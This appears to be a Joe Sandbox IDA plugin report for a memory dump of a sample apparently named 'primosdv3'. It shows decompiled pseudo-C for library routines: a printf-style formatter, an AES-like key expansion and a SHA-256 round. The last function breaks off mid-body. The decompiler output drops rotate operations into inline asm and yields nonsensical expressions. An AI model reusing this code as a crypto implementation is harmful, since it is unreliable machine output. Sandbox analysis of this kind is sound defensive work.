0x00c85278
0x00c851f0
0x00000000
0x00000000
0x00c851f6
0x00c851f8
0x00c85238
0x00c85238
0x00c8523b
0x00c85254
0x00000000
0x00c85254
0x00c8523d
0x00c8523d
0x00c85240
0x00000000
0x00000000
0x00c85243
0x00c85246
0x00000000
0x00000000
0x00c85248
0x00c8524b
0x00000000
0x00c8524b
0x00c851fa
0x00c85232
0x00000000
0x00c85232
0x00c851fe
0x00000000
0x00000000
0x00c85207
0x00000000
0x00000000
0x00c8520c
0x00000000
0x00000000
0x00c85211
0x00000000
0x00000000
0x00c8521a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbc977b387c6a82d8b2937360e7b5689fd8e16e40667529c7056f8659aa6b132
Instruction ID: e19dda1a357375ebb1cdf7af2b5ec2714709efd5aed6f237239c0f89f1c1fb70
Opcode Fuzzy Hash: dbc977b387c6a82d8b2937360e7b5689fd8e16e40667529c7056f8659aa6b132
Instruction Fuzzy Hash: A561CA71640F0857CE38BA686891BBE6394EB5234CF14051EE493DF2E1DAD1EF42A30D

Uniqueness

Uniqueness Score: -1.00%

Function 00C84F9A Relevance: .2, Instructions: 214
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 88%

			E00C84F9A(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00C85B88(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00C84464(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00C85E83(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00C84464(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00C85D51(_t119, _t113, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00C84464(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00C85993(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00C85B70(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00C8559F(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00C85ADD(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00C85B51(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00C854D9(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E00C8586B(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x00c84f9f
0x00c84fa2
0x00c84fa6
0x00c84fa9
0x00c84fad
0x00c84fb0
0x00c8501e
0x00c85021
0x00c85070
0x00c85070
0x00c85073
0x00c84fe0
0x00c84fe2
0x00c84fe7
0x00c84fe9
0x00c8508e
0x00c85092
0x00c8509b
0x00c850a0
0x00c850a1
0x00c850a5
0x00c850a7
0x00c850ac
0x00c850af
0x00c850b1
0x00c850da
0x00c850da
0x00c850dd
0x00c850e0
0x00c850e7
0x00c850e9
0x00c850ec
0x00c850ee
0x00c850f2
0x00c850f2
0x00c850f5
0x00c85100
0x00c85100
0x00c85102
0x00c85102
0x00c85104
0x00c8510a
0x00c8510a
0x00c8510f
0x00c85112
0x00c8511d
0x00c8511d
0x00c8511f
0x00c8511f
0x00c8512a
0x00c8512e
0x00c8512e
0x00c85131
0x00c85137
0x00c85139
0x00c8513c
0x00c8514c
0x00c85151
0x00c85151
0x00c85166
0x00c8516b
0x00c8516e
0x00c85173
0x00c85176
0x00c85178
0x00c8517a
0x00c8517d
0x00c85180
0x00c8518d
0x00c85192
0x00c85192
0x00c85180
0x00c85199
0x00c8519e
0x00c851a1
0x00c851a6
0x00c851a9
0x00c851ab
0x00c851b8
0x00c851bd
0x00c851ab
0x00c851c0
0x00c851c3
0x00c851c8
0x00c851c8
0x00c85114
0x00c85117
0x00000000
0x00000000
0x00c85119
0x00000000
0x00c85119
0x00c85106
0x00c85108
0x00000000
0x00000000
0x00000000
0x00c85108
0x00c850f7
0x00c850fa
0x00000000
0x00000000
0x00c850fc
0x00000000
0x00c850fc
0x00c850f0
0x00c850f0
0x00c850f0
0x00000000
0x00c850f0
0x00c850e2
0x00c850e5
0x00000000
0x00000000
0x00000000
0x00c850e5
0x00c850b5
0x00c850b8
0x00c850ba
0x00c850c2
0x00c850c4
0x00c850ce
0x00c850d0
0x00c850d2
0x00000000
0x00000000
0x00c850d4
0x00c850d8
0x00c850d8
0x00000000
0x00c850d8
0x00c850c6
0x00000000
0x00c850c6
0x00c850bc
0x00000000
0x00c850bc
0x00c85094
0x00000000
0x00c85094
0x00c84fef
0x00c84fef
0x00000000
0x00c84fef
0x00c8507a
0x00c8507a
0x00c8507d
0x00c8504f
0x00c8504f
0x00c85050
0x00c85052
0x00c85054
0x00000000
0x00c85054
0x00c8507f
0x00c85082
0x00000000
0x00000000
0x00c85088
0x00c84ff7
0x00c84ff7
0x00000000
0x00c84ff7
0x00c85023
0x00c85066
0x00000000
0x00c85066
0x00c85025
0x00c85028
0x00c8505b
0x00c8505d
0x00000000
0x00c8505d
0x00c8502a
0x00c8502d
0x00c8504b
0x00c8504b
0x00c8504b
0x00c8504b
0x00000000
0x00c8504b
0x00c8502f
0x00c85032
0x00c85044
0x00000000
0x00c85044
0x00c85034
0x00c85037
0x00000000
0x00000000
0x00c8503b
0x00000000
0x00c8503b
0x00c84fb2
0x00000000
0x00000000
0x00c84fb8
0x00c84fbb
0x00c84ffb
0x00c84ffb
0x00c84ffe
0x00c85017
0x00000000
0x00c85017
0x00c85000
0x00c85000
0x00c85003
0x00000000
0x00000000
0x00c85006
0x00c85009
0x00000000
0x00000000
0x00c8500b
0x00c8500e
0x00000000
0x00c8500e
0x00c84fbd
0x00c84ff6
0x00000000
0x00c84ff6
0x00c84fc2
0x00000000
0x00000000
0x00c84fcb
0x00000000
0x00000000
0x00c84fd0
0x00000000
0x00000000
0x00c84fd5
0x00000000
0x00000000
0x00c84fde
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction ID: 6c92b70fe18eb50f79d5115578b43b8691ee50ee9cc58415f4c53453dd4be8ab
Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
Instruction Fuzzy Hash: 6D513670204F455BDF387A68855ABBF23C59B0230CF18091DE992DB282C795EF05A39D

Uniqueness

Uniqueness Score: -1.00%

Function 00C6EFE2 Relevance: .2, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00C6EFE2(intOrPtr __ecx, char _a4) {
				char _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed char _v17;
				signed char _v18;
				signed char _v19;
				signed char _v20;
				char _v28;
				signed int _v29;
				signed int _v30;
				signed int _v31;
				signed int _v32;
				signed int* _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _t94;
				signed int _t113;
				signed int _t116;
				signed int _t117;
				signed char _t120;
				signed int* _t121;
				signed int* _t122;
				signed int _t123;
				signed int* _t124;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				signed int* _t128;
				void* _t130;
				signed int _t131;
				void* _t132;
				signed int _t134;
				signed int* _t139;
				signed int* _t142;
				void* _t145;
				void* _t167;

				_t134 = _a4 - 6;
				_v48 = __ecx;
				_v40 = _t134;
				_t94 = E00C80320( &_v32, _a4, 0x20);
				_t145 =  &_v48 + 0xc;
				_t117 = 0;
				_t126 = 0;
				_t127 = 0;
				if(_t134 <= 0) {
					L10:
					if(_t117 <= _a4) {
						_t128 = 0xc9e198;
						do {
							_t120 = _v32 ^  *(( *(_t145 + 0x1d + _t134 * 4) & 0x000000ff) + 0xc9e098);
							_v32 = _t120;
							_v31 = _v31 ^  *(( *(_t145 + 0x1e + _t134 * 4) & 0x000000ff) + 0xc9e098);
							_v30 = _v30 ^  *(( *(_t145 + 0x1f + _t134 * 4) & 0x000000ff) + 0xc9e098);
							_v29 = _v29 ^  *(( *(_t145 + 0x1c + _t134 * 4) & 0x000000ff) + 0xc9e098);
							_t94 =  *_t128 ^ _t120;
							_v32 = _t94;
							_v36 =  &(_t128[0]);
							if(_t134 == 8) {
								_t121 =  &_v28;
								_v44 = 3;
								do {
									_t130 = 4;
									do {
										 *_t121 =  *_t121 ^  *(_t121 - 4);
										_t121 =  &(_t121[0]);
										_t130 = _t130 - 1;
									} while (_t130 != 0);
									_t55 =  &_v44;
									 *_t55 = _v44 - 1;
								} while ( *_t55 != 0);
								_t122 =  &_v12;
								_v44 = 3;
								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0xc9e098);
								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0xc9e098);
								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0xc9e098);
								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0xc9e098);
								do {
									_t131 = 4;
									do {
										_t94 =  *((intOrPtr*)(_t122 - 4));
										 *_t122 =  *_t122 ^ _t94;
										_t122 =  &(_t122[0]);
										_t131 = _t131 - 1;
									} while (_t131 != 0);
									_t76 =  &_v44;
									 *_t76 = _v44 - 1;
								} while ( *_t76 != 0);
								goto L28;
							} else {
								if(_t134 > 1) {
									_t124 =  &_v28;
									_v44 = _t134 - 1;
									do {
										_t132 = 4;
										do {
											_t94 =  *((intOrPtr*)(_t124 - 4));
											 *_t124 =  *_t124 ^ _t94;
											_t124 =  &(_t124[0]);
											_t132 = _t132 - 1;
										} while (_t132 != 0);
										_t50 =  &_v44;
										 *_t50 = _v44 - 1;
									} while ( *_t50 != 0);
								}
								_t131 = 0;
								if(_t134 <= 0) {
									L37:
									_t167 = _t117 - _a4;
								} else {
									L28:
									while(_t117 <= _a4) {
										if(_t131 < _t134) {
											_t139 =  &(( &_v32)[_t131]);
											while(_t126 < 4) {
												_t123 = _t126 + _t117 * 4;
												_t113 =  *_t139;
												_t131 = _t131 + 1;
												_t139 =  &_a4;
												_t126 = _t126 + 1;
												 *(_v48 + 0x18 + _t123 * 4) = _t113;
												_t134 = _v40;
												if(_t131 < _t134) {
													continue;
												}
												break;
											}
										}
										if(_t126 == 4) {
											_t117 = _t117 + 1;
										}
										_t90 = _t126 - 4; // -4
										_t94 =  ~_t90;
										asm("sbb eax, eax");
										_t126 = _t126 & _t94;
										if(_t131 < _t134) {
											continue;
										} else {
											goto L37;
										}
										goto L38;
									}
								}
							}
							L38:
							_t128 = _v36;
						} while (_t167 <= 0);
					}
				} else {
					while(_t117 <= _a4) {
						if(_t127 < _t134) {
							_t142 =  &(( &_v32)[_t127]);
							while(_t126 < 4) {
								_t125 = _t126 + _t117 * 4;
								_t116 =  *_t142;
								_t127 = _t127 + 1;
								_t142 =  &_a4;
								_t126 = _t126 + 1;
								 *(_v48 + 0x18 + _t125 * 4) = _t116;
								_t134 = _v40;
								if(_t127 < _t134) {
									continue;
								}
								break;
							}
						}
						if(_t126 == 4) {
							_t117 = _t117 + 1;
						}
						_t18 = _t126 - 4; // -4
						_t94 =  ~_t18;
						asm("sbb eax, eax");
						_t126 = _t126 & _t94;
						if(_t127 < _t134) {
							continue;
						} else {
							goto L10;
						}
						goto L39;
					}
				}
				L39:
				return _t94;
			}

0x00c6eff8
0x00c6effb
0x00c6f000
0x00c6f004
0x00c6f009
0x00c6f00c
0x00c6f00e
0x00c6f010
0x00c6f014
0x00c6f062
0x00c6f065
0x00c6f06b
0x00c6f070
0x00c6f079
0x00c6f07f
0x00c6f08e
0x00c6f09d
0x00c6f0ac
0x00c6f0b2
0x00c6f0b5
0x00c6f0b9
0x00c6f0c0
0x00c6f0f3
0x00c6f0f7
0x00c6f0ff
0x00c6f101
0x00c6f102
0x00c6f105
0x00c6f107
0x00c6f108
0x00c6f108
0x00c6f10d
0x00c6f10d
0x00c6f10d
0x00c6f119
0x00c6f11d
0x00c6f12b
0x00c6f13a
0x00c6f149
0x00c6f158
0x00c6f15c
0x00c6f15e
0x00c6f15f
0x00c6f15f
0x00c6f162
0x00c6f164
0x00c6f165
0x00c6f165
0x00c6f16a
0x00c6f16a
0x00c6f16a
0x00000000
0x00c6f0c2
0x00c6f0c5
0x00c6f0ca
0x00c6f0ce
0x00c6f0d2
0x00c6f0d4
0x00c6f0d5
0x00c6f0d5
0x00c6f0d8
0x00c6f0da
0x00c6f0db
0x00c6f0db
0x00c6f0e0
0x00c6f0e0
0x00c6f0e0
0x00c6f0d2
0x00c6f0e7
0x00c6f0eb
0x00c6f1b9
0x00c6f1b9
0x00c6f0f1
0x00000000
0x00c6f171
0x00c6f178
0x00c6f17e
0x00c6f182
0x00c6f18b
0x00c6f18e
0x00c6f191
0x00c6f192
0x00c6f195
0x00c6f196
0x00c6f19a
0x00c6f1a0
0x00000000
0x00000000
0x00000000
0x00c6f1a0
0x00c6f1a2
0x00c6f1a9
0x00c6f1ab
0x00c6f1ab
0x00c6f1ac
0x00c6f1af
0x00c6f1b1
0x00c6f1b3
0x00c6f1b7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6f1b7
0x00c6f171
0x00c6f0eb
0x00c6f1bc
0x00c6f1bc
0x00c6f1bc
0x00c6f070
0x00000000
0x00c6f016
0x00c6f021
0x00c6f027
0x00c6f02b
0x00c6f034
0x00c6f037
0x00c6f03a
0x00c6f03b
0x00c6f03e
0x00c6f03f
0x00c6f043
0x00c6f049
0x00000000
0x00000000
0x00000000
0x00c6f049
0x00c6f04b
0x00c6f052
0x00c6f054
0x00c6f054
0x00c6f055
0x00c6f058
0x00c6f05a
0x00c6f05c
0x00c6f060
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00c6f060
0x00c6f016
0x00c6f1cd
0x00c6f1cd

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44cfe23b725d5b274b233321216e5a9e8b06d8c4d5574ba38bdc41be3b709ef9
Instruction ID: ee1281178dffa6b29bdf7be6307dc2a85095063bdaa12003a5193b55f09c034a
Opcode Fuzzy Hash: 44cfe23b725d5b274b233321216e5a9e8b06d8c4d5574ba38bdc41be3b709ef9
Instruction Fuzzy Hash: 7351E2315093D58FD722CF28D18046EBFE0AEAA314F4909ADE4D95B243C231DB4BDB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C700B7 Relevance: .1, Instructions: 141
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00C700B7() {
				signed int _t81;
				signed int _t96;
				signed int _t98;
				signed int* _t99;
				unsigned int* _t100;
				void* _t101;
				unsigned int _t103;
				signed int _t108;
				unsigned int _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t130;
				signed int _t131;
				signed int* _t132;
				signed int _t133;
				signed int _t140;
				void* _t146;
				void* _t147;
				void* _t148;
				signed int _t149;
				void* _t151;

				_t130 =  *(_t151 + 0x148);
				_t133 = 0;
				_t99 =  &(_t130[0xa]);
				do {
					 *((intOrPtr*)(_t151 + 0x48 + _t133 * 4)) = E00C868E4( *_t99);
					_t99 =  &(_t99[1]);
					_t133 = _t133 + 1;
				} while (_t133 < 0x10);
				_t100 = _t151 + 0x80;
				_t148 = 0x30;
				do {
					_t103 =  *(_t100 - 0x34);
					_t122 =  *_t100;
					asm("rol esi, 0xe");
					_t100 =  &(_t100[1]);
					asm("ror eax, 0x7");
					asm("rol eax, 0xd");
					asm("rol ecx, 0xf");
					_t100[1] = (_t103 ^ _t103 ^ _t103 >> 0x00000003) + (_t122 ^ _t122 ^ _t122 >> 0x0000000a) +  *((intOrPtr*)(_t100 - 0x3c)) +  *((intOrPtr*)(_t100 - 0x18));
					_t148 = _t148 - 1;
				} while (_t148 != 0);
				_t81 =  *_t130;
				_t101 = 0;
				_t108 = _t130[1];
				_t124 = _t130[2];
				_t140 = _t130[5];
				_t149 = _t130[4];
				 *(_t151 + 0x20) = _t81;
				 *(_t151 + 0x2c) = _t81;
				 *(_t151 + 0x28) = _t130[3];
				 *(_t151 + 0x10) = _t130[6];
				_t131 =  *(_t151 + 0x20);
				 *(_t151 + 0x14) = _t108;
				 *(_t151 + 0x18) = _t124;
				 *(_t151 + 0x1c) = _t140;
				 *(_t151 + 0x24) = _t130[7];
				do {
					 *(_t151 + 0x40) =  *(_t151 + 0x10);
					asm("rol eax, 0x7");
					 *(_t151 + 0x3c) = _t140;
					asm("ror esi, 0xb");
					 *(_t151 + 0x30) = _t108;
					 *(_t151 + 0x34) = _t124;
					_t125 =  *(_t151 + 0x1c);
					asm("ror eax, 0x6");
					 *(_t151 + 0x1c) = _t149;
					 *(_t151 + 0x38) = _t149;
					_t40 = _t101 + 0xc93b28; // 0x428a2f98
					_t146 = (_t149 ^ _t149 ^ _t149) + ( !_t149 &  *(_t151 + 0x10) ^ _t125 & _t149) +  *_t40 +  *((intOrPtr*)(_t151 + _t101 + 0x44));
					_t101 = _t101 + 4;
					_t147 = _t146 +  *(_t151 + 0x24);
					 *(_t151 + 0x24) =  *(_t151 + 0x10);
					_t149 =  *(_t151 + 0x28) + _t147;
					 *(_t151 + 0x10) = _t125;
					asm("rol eax, 0xa");
					asm("ror edx, 0xd");
					 *(_t151 + 0x20) = _t131;
					asm("ror eax, 0x2");
					 *(_t151 + 0x28) =  *(_t151 + 0x18);
					_t96 =  *(_t151 + 0x14);
					_t108 = _t131;
					 *(_t151 + 0x18) = _t96;
					 *(_t151 + 0x14) = _t108;
					_t131 = (_t131 ^ _t131 ^ _t131) + (( *(_t151 + 0x18) ^  *(_t151 + 0x14)) & _t131 ^  *(_t151 + 0x18) &  *(_t151 + 0x14)) + _t147;
					_t140 =  *(_t151 + 0x1c);
					_t124 = _t96;
				} while (_t101 < 0x100);
				_t98 =  *(_t151 + 0x2c) + _t131;
				_t132 =  *(_t151 + 0x148);
				_t132[1] = _t132[1] + _t108;
				_t132[2] = _t132[2] +  *(_t151 + 0x30);
				_t132[3] = _t132[3] +  *(_t151 + 0x34);
				_t132[5] = _t132[5] +  *(_t151 + 0x38);
				_t132[6] = _t132[6] +  *(_t151 + 0x3c);
				_t132[4] = _t132[4] + _t149;
				_t132[7] = _t132[7] +  *(_t151 + 0x40);
				 *_t132 = _t98;
				return _t98;
			}

0x00c700c1
0x00c700c8
0x00c700ca
0x00c700cd
0x00c700d4
0x00c700d8
0x00c700db
0x00c700dd
0x00c700e4
0x00c700eb
0x00c700ec
0x00c700ec
0x00c700f1
0x00c700f5
0x00c700f8
0x00c700fb
0x00c70109
0x00c7010c
0x00c7011e
0x00c70121
0x00c70121
0x00c70126
0x00c70128
0x00c7012a
0x00c7012d
0x00c70130
0x00c70133
0x00c70136
0x00c7013a
0x00c70141
0x00c70148
0x00c7014f
0x00c70153
0x00c70157
0x00c7015b
0x00c7015f
0x00c70163
0x00c70167
0x00c7016d
0x00c70170
0x00c70176
0x00c7017b
0x00c7017f
0x00c70185
0x00c7018b
0x00c70198
0x00c7019e
0x00c701ae
0x00c701b4
0x00c701b8
0x00c701bb
0x00c701bf
0x00c701c3
0x00c701c5
0x00c701cb
0x00c701d0
0x00c701d5
0x00c701db
0x00c701f8
0x00c701fc
0x00c70200
0x00c70202
0x00c70206
0x00c7020a
0x00c7020d
0x00c70211
0x00c70213
0x00c70223
0x00c70225
0x00c7022c
0x00c70233
0x00c7023a
0x00c70241
0x00c70248
0x00c7024b
0x00c70252
0x00c70255
0x00c70261

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0d18f9ca97730c88b4224dc789b93a468a006cfac931b419a23871fe31b8b
Instruction ID: 118f6d7a90c1ef6a5821293148071acd13ec15b1b464c3a2ca833e9ce362cdc5
Opcode Fuzzy Hash: d6c0d18f9ca97730c88b4224dc789b93a468a006cfac931b419a23871fe31b8b
Instruction Fuzzy Hash: 6951E0B1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3340D734EA59CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00C73E0B Relevance: .1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C73E0B(unsigned int __ecx) {
				intOrPtr _t39;
				signed int _t47;
				intOrPtr _t48;
				signed int _t55;
				signed int _t61;
				signed int _t66;
				intOrPtr _t78;
				signed int _t82;
				unsigned char _t84;
				signed int* _t86;
				intOrPtr _t87;
				unsigned int _t88;
				unsigned int _t89;
				signed int _t90;
				void* _t91;

				_t88 =  *(_t91 + 0x20);
				_t61 = 0;
				_t86 =  *(_t91 + 0x28);
				_t89 = __ecx;
				 *(_t91 + 0x18) = __ecx;
				_t86[3] = 0;
				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E00C74E52(__ecx) != 0) {
					E00C6A881(_t88,  ~( *(_t88 + 4)) & 0x00000007);
					 *(_t91 + 0x18) = E00C6A898(_t88) >> 8;
					E00C6A881(_t88, 8);
					_t66 =  *(_t91 + 0x14) & 0x000000ff;
